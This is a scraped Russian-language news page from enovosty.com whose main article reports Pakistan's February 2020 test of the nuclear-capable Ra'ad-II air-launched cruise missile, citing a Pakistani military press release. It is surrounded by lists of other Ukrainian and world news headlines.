id="post-4795214"> <span class="postDate">19:18</span> <a class="postTitle" href="https://enovosty.com/news_society/full/1902-konstitucionnyj-sud-ukrainy-priznal-nezakonnoj-likvidaciyu-verxovnogo-suda-v-2016-godu-reuters">Конституционный суд Украины признал незаконной ликвидацию Верховного суда в 2016 году, - Reuters</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4795211"> <span class="postDate">18:52</span> <a class="postTitle" href="https://enovosty.com/news_politics/full/1902-obostrenie-konflikta-na-donbasse-mozhet-povliyat-na-mirnye-peregovory-ruslan-bortnik">Обострение конфликта на Донбассе может повлиять на мирные переговоры, - Руслан Бортник</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4795207"> <span class="postDate">18:16</span> <a class="postTitle" href="https://enovosty.com/news_society/full/1902-zagorodnyuk-rasskazal-o-situacii-na-fronte">Загороднюк рассказал о ситуации на фронте</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4795198"> <span class="postDate">17:48</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/1902-v-es-razrabatyvayut-pravila-po-primeneniyu-iskusstvennogo-intellekta-podrobnosti">В ЕС разрабатывают правила по применению искусственного интеллекта: подробности</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4795190"> <span class="postDate">17:21</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/1902-stalo-izvestno-kogda-spacex-otpravit-v-kosmos-pervyx-turistov">Стало известно, когда SpaceX отправит в космос первых туристов</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4795171"> <span class="postDate">16:42</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/1902-ssha-i-indiya-planiruyut-zaklyuchit-krupnoe-torgovoe-soglashenie">США и Индия планируют заключить крупное торговое соглашение</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4795164"> <span class="postDate">16:23</span> <a class="postTitle" href="https://enovosty.com/news_politics/full/1902-rynok-zemli-zakonodatelnym-spamom-deputaty-vytorgovyvayut-sebe-dolzhnosti-v-kabmine-i-ministerstvax-aleksandr-kachura-video">Рынок земли: Законодательным спамом депутаты выторговывают себе должности в Кабмине, - Александр Качура (ВИДЕО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4795165"> <span class="postDate">16:18</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/1902-argentinu-mogut-pokinut-krupnye-neftyanye-kompanii-reuters">Shell и другие крупные нефтяные компании покидают Аргентину, - Reuters</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4795160"> <span class="postDate">15:51</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/1902-net-zakazov-rossijskij-sukhoi-superjet-uxodit-v-pike">"Нет заказов": российский Sukhoi Superjet уходит в пике</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4795095"> <span class="postDate">15:20</span> <a class="postTitle" href="https://enovosty.com/news_technology/full/1902-britanskaya-armiya-sobiraetsya-stroit-elektricheskie-boevye-mashiny">Британская армия собирается строить электрические боевые машины</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4795147"> <span class="postDate">15:20</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/1902-samolet-kanadskoj-aviakompanii-poteryal-koleso-no-sumel-prizemlitsya-video">Самолет канадской авиакомпании потерял колесо, но сумел приземлиться (ВИДЕО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4795154"> <span class="postDate">15:18</span> <a class="postTitle" href="https://enovosty.com/news_technology/full/1902-rossijskij-ledokol-arktika-vyshel-iz-stroya-sgorevshij-dvigatel-ne-podlezhit-vosstanovleniyu">Не судьба: "Росатом" не успеет сдать в срок атомный ледокол "Арктика" - двигатель сгорел</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4795155"> <span class="postDate">15:14</span> <a class="postTitle" href="https://enovosty.com/news_society/full/1902-minekonomiki-napravit-na-razvitie-sel-10-mlrd-doll-pryamyx-investicij">Минэкономики направит на развитие сел 10 млрд долл прямых инвестиций</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4795104"> <span class="postDate">14:20</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/1902-sereznyj-konkurent-trampa-na-vyborax-predlozhil-vplotnuyu-zanyatsya-voprosom-kriptovalyuty">Серьезный конкурент Трампа на выборах предложил вплотную заняться вопросом криптовалюты</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4795137"> <span class="postDate">13:40</span> <a class="postTitle" href="https://enovosty.com/news_kiev/full/1902-stalo-izvestno-skolko-zhilyx-domov-v-kieve-podlezhat-snosu-iz-za-avarijnogo-sostoyaniya">Стало известно, сколько жилых домов в Киеве подлежат сносу из-за аварийного состояния</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4795134"> <span class="postDate">13:25</span> <a class="postTitle" href="https://enovosty.com/news-auto/full/1902-statistika-dtp-v-ukraine-za-yanvar-2020-goda-cifry-shokiruyut">Опубликована пугающая статистика ДТП в Украине за январь</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4795111"> <span class="postDate">13:20</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/1902-tramp-zayavil-o-predstoyashhej-krupnoj-sdelke-s-indiej">Трамп заявил о предстоящей крупной сделке с Индией</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4795145"> <span class="postDate">13:07</span> <a class="postTitle" href="https://enovosty.com/news_economy/full/1902-komu-ukrainskie-banki-mogut-zablokirovat-scheta">Кому украинские банки могут заблокировать счета</a><br /> </span><div class="postFields"></div></div><div class="cls"></div><a class="readMore" href="https://enovosty.com/news/">Все новости &raquo;</a></div><div class="links_bal"></div>  </div><div style="width:474px; border:none;" id="center"><div style="width:474px;overflow: visible;" class="wiget simple_category"><style type="text/css" media="screen">@import url(https://enovosty.com/wp-content/themes/eizvestia/css/singlePage.min.css?v=1);</style><style>#center .wiget.singlePost .plot{float:right;margin:5px 0 5px 10px;width:250px}</style><div class="wiget simple singlePost" style="float: left; overflow: hidden; height:auto; border:none; padding:0; margin-bottom:10px;" > <div itemscope itemtype="https://schema.org/NewsArticle" class="post _ga1_on_" style="margin:0; padding:0; " id="post-4795251"><meta itemscope itemprop="mainEntityOfPage" itemType="https://schema.org/WebPage" itemid="https://enovosty.com/news_technology/full/2002-pakistan-uspeshno-ispytal-yadernuyu-raketu-nositel-raad-ii"/><article style="font-size:12pt;"><h1 itemprop="headline" id="postTitle">Пакистан успешно испытал ядерную ракету-носитель Ra’ad-II</h1><div class="breadcrumb"><a href="https://enovosty.com/">Главная</a> <span>&raquo;</span> <a href="https://enovosty.com/news/">Последние новости</a> <span>&raquo;</span> <a href="https://enovosty.com/news/news_technology">Новости технологий</a> <span>&raquo;</span> Пакистан успешно испытал ядерную ракету-носитель Ra’ad-II</div><time datetime="2020-02-20T14:00:37+02:00"><span id="date">Новости технологий, 14:00:37 </span></time><div class="border">&nbsp;</div><table class="social"><tr><td><div class="swp_social_panel swp_horizontal_panel swp_flat_fresh swp_default_full_color swp_individual_full_color swp_other_full_color scale-100 scale-" data-min-width="1100" data-float-color="#ffffff" data-float="none" data-float-mobile="none" data-transition="slide" ><div class="nc_tweetContainer swp_share_button swp_facebook" data-network="facebook"><a class="nc_tweet swp_share_link" rel="nofollow noreferrer noopener" target="_blank" href="https://www.facebook.com/share.php?u=https%3A%2F%2Fenovosty.com%2Fnews_technology%2Ffull%2F2002-pakistan-uspeshno-ispytal-yadernuyu-raketu-nositel-raad-ii" data-link="https://www.facebook.com/share.php?u=https%3A%2F%2Fenovosty.com%2Fnews_technology%2Ffull%2F2002-pakistan-uspeshno-ispytal-yadernuyu-raketu-nositel-raad-ii"><span class="swp_count swp_hide"><span class="iconFiller"><span class="spaceManWilly"><i class="sw swp_facebook_icon"></i><span class="swp_share">Поделиться</span></span></span></span></a></div><div class="nc_tweetContainer swp_share_button swp_twitter" data-network="twitter"><a class="nc_tweet swp_share_link" rel="nofollow noreferrer noopener" target="_blank" href="https://twitter.com/intent/tweet?text=%D0%9F%D0%B0%D0%BA%D0%B8%D1%81%D1%82%D0%B0%D0%BD+%D1%83%D1%81%D0%BF%D0%B5%D1%88%D0%BD%D0%BE+%D0%B8%D1%81%D0%BF%D1%8B%D1%82%D0%B0%D0%BB+%D1%8F%D0%B4%D0%B5%D1%80%D0%BD%D1%83%D1%8E+%D1%80%D0%B0%D0%BA%D0%B5%D1%82%D1%83-%D0%BD%D0%BE%D1%81%D0%B8%D1%82%D0%B5%D0%BB%D1%8C+Ra%E2%80%99ad-II&url=https%3A%2F%2Fenovosty.com%2Fnews_technology%2Ffull%2F2002-pakistan-uspeshno-ispytal-yadernuyu-raketu-nositel-raad-ii&via=enovosty" data-link="https://twitter.com/intent/tweet?text=%D0%9F%D0%B0%D0%BA%D0%B8%D1%81%D1%82%D0%B0%D0%BD+%D1%83%D1%81%D0%BF%D0%B5%D1%88%D0%BD%D0%BE+%D0%B8%D1%81%D0%BF%D1%8B%D1%82%D0%B0%D0%BB+%D1%8F%D0%B4%D0%B5%D1%80%D0%BD%D1%83%D1%8E+%D1%80%D0%B0%D0%BA%D0%B5%D1%82%D1%83-%D0%BD%D0%BE%D1%81%D0%B8%D1%82%D0%B5%D0%BB%D1%8C+Ra%E2%80%99ad-II&url=https%3A%2F%2Fenovosty.com%2Fnews_technology%2Ffull%2F2002-pakistan-uspeshno-ispytal-yadernuyu-raketu-nositel-raad-ii&via=enovosty"><span class="swp_count swp_hide"><span class="iconFiller"><span class="spaceManWilly"><i class="sw swp_twitter_icon"></i><span class="swp_share">Tвитнуть</span></span></span></span></a></div><div class="nc_tweetContainer swp_share_button swp_linkedin" data-network="linkedin"><a class="nc_tweet swp_share_link" rel="nofollow noreferrer noopener" target="_blank" href="https://www.linkedin.com/cws/share?url=https%3A%2F%2Fenovosty.com%2Fnews_technology%2Ffull%2F2002-pakistan-uspeshno-ispytal-yadernuyu-raketu-nositel-raad-ii" data-link="https://www.linkedin.com/cws/share?url=https%3A%2F%2Fenovosty.com%2Fnews_technology%2Ffull%2F2002-pakistan-uspeshno-ispytal-yadernuyu-raketu-nositel-raad-ii"><span class="swp_count swp_hide"><span class="iconFiller"><span class="spaceManWilly"><i class="sw swp_linkedin_icon"></i><span class="swp_share">Поделиться</span></span></span></span></a></div></div></td></tr></table><div class="printmail"> <a href="https://enovosty.com/print?printajax=4795251" style="padding-right:3px;"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/print.png" width="18" height="18" alt="Печать" title="Печать"></a> <a href="#" id="mailto"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/mailto.png" width="26" height="18" alt="Отправить на почту" title="Отправить на почту"></a><div class="mailwin" style="display:none;"><span class="link-close" title="Закрыть"><span class="close">Закрыть</span></span><input type="text" onclick="if (this.value == 'Введите e-mail') this.value = ''" onblur="if (this.value == '') this.value = 'Введите e-mail'" name="mail" value="Введите e-mail" /><button>Отправить</button></div><p class="al_loadingImage" style="top:4%;">&nbsp;</p></div><div class="border">&nbsp;</div><b><p>Крылатая ракета с дальностью полета 600 км значительно увеличивает возможности стратегического противодействия на суше и на море.</p></b> <div style="text-align:center;"><img width="460" height="307" src="https://enovosty.com/wp-content/uploads/2020/02/1-553-460x307.jpg" class="attachment-news-image size-news-image wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2020/02/1-553-e1582143411292.jpg 460w, https://enovosty.com/wp-content/uploads/2020/02/1-553-112x75.jpg 112w, https://enovosty.com/wp-content/uploads/2020/02/1-553-300x200.jpg 300w, https://enovosty.com/wp-content/uploads/2020/02/1-553-640x427.jpg 640w" sizes="(max-width: 460px) 100vw, 460px" /></div> <p class="synopsis"><a class="tag" href="https://enovosty.com/tag/pakistan" target="_blank">Пакистан</a> провел успешные летные <a class="tag" href="https://enovosty.com/tag/ispytaniya" target="_blank">испытания</a> крылатой ракеты с ядерным оружием Ra’ad-II и с дальностью 600 км, что значительно повысило &#171;потенциал сдерживания&#187; военных на суше и на море, информирует <a class="inform" href="https://enovosty.com/news">enovosty.com/news</a>.</p><p class="synopsis">Ракета оснащена самыми современными системами наведения и навигации, обеспечивающими высокоточное поражение целей, говорится в пресс-релизе, опубликованном Inter-Services Public Relations (ISPR), военными СМИ.</p><p class="synopsis">В заявлении говорится, что успешные летные испытания были засвидетельствованы высокопоставленными офицерами пакистанской армии и военными.</p><p class="synopsis">Генеральный директор Отдела стратегических планов генерал-лейтенант Надим Заки Мандж назвал успешный запуск «важным шагом к дополнению потенциала Пакистана по сдерживанию».</p><p class="readlink"><strong>Читайте:</strong> <a target="_blank" href="https://enovosty.com/news_technology/full/702-avianosec-uss-gerald-r-ford-proshel-testy-na-sovmestimost-s-razlichnymi-vozdushnymi-sudami-foto" >Авианосец USS Gerald R Ford прошел тесты на совместимость с различными воздушными судами (ФОТО)</a></p><p class="synopsis">В заявлении говорится, что он высоко оценил техническое мастерство пакистанских ученых и инженеров, которые разработали систему оружия и сделали запуск успешным.</p><p class="synopsis">Президент Пакистана Ариф Алви, премьер-министр Имран Хан и высокопоставленные военные чиновники поздравили ученых и инженеров с успешным проведением ракетных испытаний, говорится в сообщении.</p><p class="synopsis">В настоящее время эту ракету планируется установить на самолет Mirage или истребители F-16 ВВС Пакистана.</p><p class="synopsis">Пакистанские ракетные испытания проходят на фоне напряженности между Индией и Пакистаном после того, как Нью-Дели аннулировал особый статус провинций Джамму и Кашмира и раздвоил их на две союзные территории.</p><p class="synopsis"><em>Источник: <a rel="nofollow" href="https://www.financialexpress.com/defence/pakistan-successfully-tests-nuclear-capable-air-launched-cruise-missile-raad-ii/1872063/">Financialexpress</a></em></p><div class="tptn_counter" style="color:white;" id="tptn_counter_4795251"><script type="text/javascript" src="https://enovosty.com/wp-content/plugins/top-10/top-10-counter.js.php?top_ten_id=4795251&amp;_wpnonce=2ae5e7149d"></script></div><div class="swp-content-locator"></div><br /><span itemprop="publisher" itemscope itemtype="https://schema.org/Organization"><div itemprop="logo" itemscope itemtype="https://schema.org/ImageObject"><img itemprop="url image" style="display:none;" src="https://enovosty.com/wp-content/themes/eizvestia/img/enovosty_logo.png"/> <meta itemprop="width" content="512"> <meta itemprop="height" content="512"></div><meta itemprop="name" content="Экономические новости" /><meta itemprop="telephone" content="+380958836229"><meta itemprop="address" content="Киев"></span><span itemprop="author" itemscope itemtype="https://schema.org/Person"><meta itemprop="name" content="Оксана Ельченко" /></span><meta itemprop="datePublished" content="2020-02-20T14:00:37+02:00"/><meta itemprop="dateModified" content="2020-02-19T22:29:46+02:00"/><meta itemprop="genre" content="Новости технологий"/><meta itemprop="description" content="Крылатая ракета с дальностью полета 600 км значительно увеличивает возможности стратегического противодействия на суше и на море."/><div itemprop="image" itemscope itemtype="https://schema.org/ImageObject" rel="nofollow"><span itemprop="url" itemprop="image" content="https://enovosty.com/wp-content/uploads/2020/02/1-553-460x307.jpg"><span itemprop="image" content="https://enovosty.com/wp-content/uploads/2020/02/1-553-460x307.jpg"><meta itemprop="width" content="460"><meta itemprop="height" content="307"> </span></span></div></article></div> <div class="postFooter" style="padding:0;"><a href="https://www.youtube.com/channel/UCkFzUiPJ0z2YF4QIAhpkccg" target="_blank"><img alt="Экономические новости youtube" src="https://enovosty.com/wp-content/themes/eizvestia/img/youtube.jpg"></a><span id="authorName" style="margin-right: 25px;float: left;"><span id="label">Автор: Оксана Ельченко</span></span><div id="posttags" style="max-width: 360px;float: left;margin:10px 0 10px 7px; clear: both;">ТЕГИ: <a href="https://enovosty.com/tag/ispytaniya" rel="tag">испытания</a>, <a href="https://enovosty.com/tag/pakistan" rel="tag">Пакистан</a>, <a href="https://enovosty.com/tag/raketa" rel="tag">ракета</a></div><div style="font: 11px/16px Arial,Verdana,sans-serif;float: right;">Посещений: 187</div><div class="voteBox" > </div><br /><p style="color:#a3a3a3;font-size:12px;clear:both;">Если Вы заметили орфографическую ошибку, выделите её мышью и нажмите Ctrl+Enter</p><div class="border">&nbsp;</div><table class="social"><tr><td><div class="swp_social_panel swp_horizontal_panel swp_flat_fresh swp_default_full_color swp_individual_full_color swp_other_full_color scale-100 scale-" data-min-width="1100" data-float-color="#ffffff" data-float="none" data-float-mobile="none" data-transition="slide" ><div class="nc_tweetContainer swp_share_button swp_facebook" data-network="facebook"><a class="nc_tweet swp_share_link" rel="nofollow noreferrer noopener" target="_blank" href="https://www.facebook.com/share.php?u=https%3A%2F%2Fenovosty.com%2Fnews_technology%2Ffull%2F2002-pakistan-uspeshno-ispytal-yadernuyu-raketu-nositel-raad-ii" data-link="https://www.facebook.com/share.php?u=https%3A%2F%2Fenovosty.com%2Fnews_technology%2Ffull%2F2002-pakistan-uspeshno-ispytal-yadernuyu-raketu-nositel-raad-ii"><span class="swp_count swp_hide"><span class="iconFiller"><span class="spaceManWilly"><i class="sw swp_facebook_icon"></i><span class="swp_share">Поделиться</span></span></span></span></a></div><div class="nc_tweetContainer swp_share_button swp_twitter" data-network="twitter"><a class="nc_tweet swp_share_link" rel="nofollow noreferrer noopener" target="_blank" href="https://twitter.com/intent/tweet?text=%D0%9F%D0%B0%D0%BA%D0%B8%D1%81%D1%82%D0%B0%D0%BD+%D1%83%D1%81%D0%BF%D0%B5%D1%88%D0%BD%D0%BE+%D0%B8%D1%81%D0%BF%D1%8B%D1%82%D0%B0%D0%BB+%D1%8F%D0%B4%D0%B5%D1%80%D0%BD%D1%83%D1%8E+%D1%80%D0%B0%D0%BA%D0%B5%D1%82%D1%83-%D0%BD%D0%BE%D1%81%D0%B8%D1%82%D0%B5%D0%BB%D1%8C+Ra%E2%80%99ad-II&url=https%3A%2F%2Fenovosty.com%2Fnews_technology%2Ffull%2F2002-pakistan-uspeshno-ispytal-yadernuyu-raketu-nositel-raad-ii&via=enovosty" data-link="https://twitter.com/intent/tweet?text=%D0%9F%D0%B0%D0%BA%D0%B8%D1%81%D1%82%D0%B0%D0%BD+%D1%83%D1%81%D0%BF%D0%B5%D1%88%D0%BD%D0%BE+%D0%B8%D1%81%D0%BF%D1%8B%D1%82%D0%B0%D0%BB+%D1%8F%D0%B4%D0%B5%D1%80%D0%BD%D1%83%D1%8E+%D1%80%D0%B0%D0%BA%D0%B5%D1%82%D1%83-%D0%BD%D0%BE%D1%81%D0%B8%D1%82%D0%B5%D0%BB%D1%8C+Ra%E2%80%99ad-II&url=https%3A%2F%2Fenovosty.com%2Fnews_technology%2Ffull%2F2002-pakistan-uspeshno-ispytal-yadernuyu-raketu-nositel-raad-ii&via=enovosty"><span class="swp_count swp_hide"><span class="iconFiller"><span class="spaceManWilly"><i class="sw swp_twitter_icon"></i><span class="swp_share">Tвитнуть</span></span></span></span></a></div><div class="nc_tweetContainer swp_share_button swp_linkedin" data-network="linkedin"><a class="nc_tweet swp_share_link" rel="nofollow noreferrer noopener" target="_blank" href="https://www.linkedin.com/cws/share?url=https%3A%2F%2Fenovosty.com%2Fnews_technology%2Ffull%2F2002-pakistan-uspeshno-ispytal-yadernuyu-raketu-nositel-raad-ii" data-link="https://www.linkedin.com/cws/share?url=https%3A%2F%2Fenovosty.com%2Fnews_technology%2Ffull%2F2002-pakistan-uspeshno-ispytal-yadernuyu-raketu-nositel-raad-ii"><span class="swp_count swp_hide"><span class="iconFiller"><span class="spaceManWilly"><i class="sw swp_linkedin_icon"></i><span class="swp_share">Поделиться</span></span></span></span></a></div></div></td></tr></table><div class="printmail" style="float: right; width: 54px; margin-top: 8px;"> <a href="https://enovosty.com/print?printajax=4795251" style="padding-right:3px;"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/print.png" width="18" height="18" alt="Печать" title="Печать"></a> <a href="#" id="mailto"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/mailto.png" width="26" height="18" alt="Отправить на почту" title="Отправить на почту"></a><div class="mailwin" style="display:none;"><span class="link-close" title="Закрыть"><span class="close">Закрыть</span></span><input type="text" onclick="if (this.value == 'Введите e-mail') this.value = ''" onblur="if (this.value == '') this.value = 'Введите e-mail'" name="mail" value="Введите e-mail" /><button>Отправить</button></div><p class="al_loadingImage" style="top:4%;">&nbsp;</p></div><div class="border">&nbsp;</div><link rel="stylesheet" type="text/css" media="screen" href="https://enovosty.com/wp-content/plugins/ajax-login/login.css?v=2" /><div id="popup-login"><div class="login"><div class="caption"><span class="title">Вход на сайт</span><a class="link-close" href="#"><span class="close">Закрыть</span></a></div><form name="loginform" id="loginform" action="#" method="post"><p class="error"></p><p class="message"></p><img id="al_loadingImage" alt="Загрузка..." src="https://enovosty.com/wp-content/plugins/ajax-login/al_loading.gif"/><p><label for="user_login">Логин (email):</label><input type="text" name="user_login" id="user_login" class="input" value="" size="20" /></p><p><label for="user_pass">Пароль:</label><input type="password" name="pwd" id="user_pass" class="input" value="" size="20" /></p><div class="login-footer"><p class="forgetmenot"><input name="rememberme" type="checkbox" id="rememberme" value="forever" /><label for="rememberme">Запомнить меня</label></p><p class="submit"><input type="button" onClick="sendLogin('https://enovosty.com/wp-content/plugins/ajax-login/login.php', jQuery('#loginform').serialize());return false;" name="wp-submit" id="wp-submit" value="Войти" />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<a target="_blank" href="/register" id="wp-register">Зарегистрироваться</a></p></div><fieldset><legend>или</legend><div class="soclogin"> </div></fieldset></form></div></div><script type="text/javascript" src="https://enovosty.com/wp-content/plugins/ajax-login/ajaxlogin.js"></script><input style="width: auto;float: none;background: #2196F3;margin: 5px 0;padding: 0 10px;font-size: 12px;" type="button" value="Вход/Регистрация" id="addanons" name="wp-submit" onclick="get_auth()" ><style type="text/css" media="screen">@import url(/wp-content/plugins/ajax-comment-loading/css/style.css?v=8);</style><noscript>Для загрузки комментариев нужен JavaScript.</noscript><div id="comments-loading" style="display:none">Комментарии...</div><div id="comments-loaded"></div><input type="hidden" name="comments_nonce" value="4fc71b9b72" id="comments_nonce" /><script type="text/javascript">document.getElementById('comments-loading').style.display = 'block';</script></div>  </div><br /><div id='div-gpt-ad-1531223757969-0' style='height:600px; width:300px;'><script>googletag.cmd.push(function() { googletag.display('div-gpt-ad-1531223757969-0'); });</script></div> <div class="mainPageWiget articles" style="overflow:visible;"><p style="height: auto;overflow: visible; font-weight: 700;font-family: arial,verdana,tahoma;margin: 0;"><a style="color:#000;font-size: 16px;" href="https://enovosty.com/articles">Аналитика</a></p><hr style="border: 1px solid #000000;"><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4795157"><div class="blockTitle"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/ei_size.gif" /><a class="postTitle" href="https://enovosty.com/politika/full/1902-itogi-dnya-podderzhka-mira-tri-scenariya-dlya-ukrainy-i-kurortnyj-bezviz">Итоги дня: Поддержка мира, три сценария для Украины и курортный безвиз</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4795117"><div class="blockTitle"><a class="postTitle" href="https://enovosty.com/politika/full/1902-novoe-obostrenie-na-donbasse-stavit-davno-nazrevshie-voprosy">Новое обострение на Донбассе ставит давно назревшие вопросы</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4795004"><div class="blockTitle"><a class="postTitle" href="https://enovosty.com/politika/full/1802-itogi-dnya-tyazhelye-boi-na-donbasse-krovavye-godovshhiny-i">Итоги дня: Тяжелые бои на Донбассе, кровавые годовщины и предупреждение для РФ</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4794806"><div class="blockTitle"><a class="postTitle" href="https://enovosty.com/politika/full/1702-itogi-dnya-ekonomicheskaya-strategiya-ukrainy-neozhidannoe-zayavlenie-zelinskogo-i-ubytki-ot-anneksii-kryma">Итоги дня: Экономическая стратегия Украины, неожиданное заявление Зеленского и убытки от аннексии Крыма</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4794465"><div class="blockTitle"><a class="postTitle" href="https://enovosty.com/politika/full/1402-itogi-dnya-eksperiment-s-prizyvom-plan-zaversheniya-vojny-i-pugayushhij-prognoz-po-koronovirusu">Итоги дня: Эксперимент с призывом, скандальный план завершения войны и пугающий прогноз по короновирусу</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4794433"><div class="blockTitle"><a class="postTitle" href="https://enovosty.com/politika/full/1402-karasev-vs-fesenko-pochemu-zelenskij-ubral-bogdana">Карасев vs Фесенко: почему Зеленский убрал Богдана?</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4794324"><div class="blockTitle"><a class="postTitle" href="https://enovosty.com/politika/full/1302-itogi-dnya-udar-po-oboronke-rf-i-sovet-ukraincam-ot-pcu">Итоги дня: Удар по оборонке РФ, водное решение и совет украинцам от ПЦУ</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4794333"><div class="blockTitle"><a class="postTitle" href="https://enovosty.com/society/full/1302-kitajskij-virus-diversiya-mylnyj-puzyr-globalna-ugroza-chelovechestvu">Китайский вирус: диверсия, «мыльный пузырь» или глобальная угроза человечеству?</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4794138"><div class="blockTitle"><a class="postTitle" href="https://enovosty.com/politika/full/1302-itogi-dnya-voda-dlya-okkupanta-i-ugrozy-erdogana">Итоги дня: Вода для оккупанта, протест перевозчиков и угрозы Эрдогана</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4793983"><div class="blockTitle"><a class="postTitle" href="https://enovosty.com/politika/full/1102-itogi-dnya-uvolnenie-bogdana-sankcionnye-kulbity-i-novyj-smotryashhij-na-donbasse">Итоги дня: Увольнение Богдана, санкционные кульбиты и новый смотрящий на Донбассе</a></div><div class="more"><a href="https://enovosty.com/articles">Все статьи</a></div></div></div><br /><div
id='admixer_3b1188cc66144215a9bc9ecb1d9b44e9_zone_7939_sect_1082_site_1069'></div><script type='text/javascript'>admixerML.fn.push(function() {admixerML.display('admixer_3b1188cc66144215a9bc9ecb1d9b44e9_zone_7939_sect_1082_site_1069');});</script><div id="pop_video" class="six"><p class="head"><span>популярные видео</span></p><div class="caption" data-limit="6"> <div class="caption_link"><a href="javascript:void(0)" class="active" onclick="getbVideo(0)">читаемые</a>&nbsp;&nbsp;<a href="javascript:void(0)" data-rb="1" onclick="getbVideo(1)">комментируемые</a></div><div class="popular-sort"><div class="sort"><a onclick="getPopVideo(31)">месяц</a></div><div class="sort"><a class="active" onclick="getPopVideo(7)">неделю</a>&nbsp;&nbsp;|</div><div class="sort">за&#160;&#160;<a onclick="getPopVideo(1)">сутки</a>&nbsp;&nbsp;|</div></div></div> <table style="width:100%;" class="newsbody"><tr><td class="photo "><div class="aimg"><a href="https://enovosty.com/news_politics/full/1402-ty-chego-bykuesh-scklo-mezhdu-chernovol-i-dobkinym-v-pryamom-efire-proizoshla-perepalka-video"><img width="142" height="88" alt="Ты чего быкуешь, сц*кло?: Между Черновол и Добкиным в прямом эфире произошла перепалка" src="https://enovosty.com/wp-content/uploads/2020/02/cherno.jpg" /><span class="stopbg"></span></a><a class="title" href="https://enovosty.com/news_politics/full/1402-ty-chego-bykuesh-scklo-mezhdu-chernovol-i-dobkinym-v-pryamom-efire-proizoshla-perepalka-video">Ты чего быкуешь, сц*кло?: Между Черновол и Добкиным в прямом эфире произошла перепалка</a></div></td><td class="photo "><div class="aimg"><a href="https://enovosty.com/news_abroad/full/1702-vysshij-pilotazh-pilotam-udalos-bokom-posadit-avialajner-vo-vremya-shtorma-v-aeroportu-xitrou-video"><img width="142" height="88" alt="Высший пилотаж: Пилотам удалось боком посадить авиалайнер во время шторма в аэропорту Хитроу" src="https://enovosty.com/wp-content/uploads/2020/02/samol1.jpg" /><span class="stopbg"></span></a><a class="title" href="https://enovosty.com/news_abroad/full/1702-vysshij-pilotazh-pilotam-udalos-bokom-posadit-avialajner-vo-vremya-shtorma-v-aeroportu-xitrou-video">Высший пилотаж: Пилотам удалось боком посадить авиалайнер во время шторма в аэропорту Хитроу</a></div></td><td class="photo last"><div class="aimg"><a href="https://enovosty.com/news_society/full/1602-v-set-popala-draka-kenguru-i-velosipedista"><img width="142" height="88" alt="В Сеть попала невероятная драка кенгуру и велосипедиста в Австралии" src="https://enovosty.com/wp-content/uploads/2020/02/kenguru.jpg" /><span class="stopbg"></span></a><a class="title" href="https://enovosty.com/news_society/full/1602-v-set-popala-draka-kenguru-i-velosipedista">В Сеть попала невероятная драка кенгуру и велосипедиста в Австралии</a></div></td></tr><tr><td class="view"><span><i></i>7438</span></td><td class="view"><span><i></i>4237</span></td><td class="view last"><span><i></i>2616</span></td></tr><tr><td class="photo "><div class="aimg"><a href="https://enovosty.com/news_politics/full/1802-vsu-moshhno-otvetili-ukraina-na-puti-prekrashheniya-vojny-na-donbasse-vladimir-zelenskij-video"><img width="142" height="88" alt="«ВСУ мощно ответили!»: Украина на пути прекращения войны на Донбассе, - Владимир Зеленский" src="https://enovosty.com/wp-content/uploads/2020/02/zell.jpg" /><span class="stopbg"></span></a><a class="title" href="https://enovosty.com/news_politics/full/1802-vsu-moshhno-otvetili-ukraina-na-puti-prekrashheniya-vojny-na-donbasse-vladimir-zelenskij-video">«ВСУ мощно ответили!»: Украина на пути прекращения войны на Донбассе, - Владимир Зеленский</a></div></td><td class="photo "><div class="aimg"><a href="https://enovosty.com/news_abroad/full/2002-amerikanskij-i-rossijskij-broneavtomobili-vstupili-v-konflikt-v-sirii-video"><img width="142" height="88" alt="Американский и российский бронеавтомобили вступили в конфликт в Сирии" src="https://enovosty.com/wp-content/uploads/2020/02/tehnika.jpg" /><span class="stopbg"></span></a><a class="title" 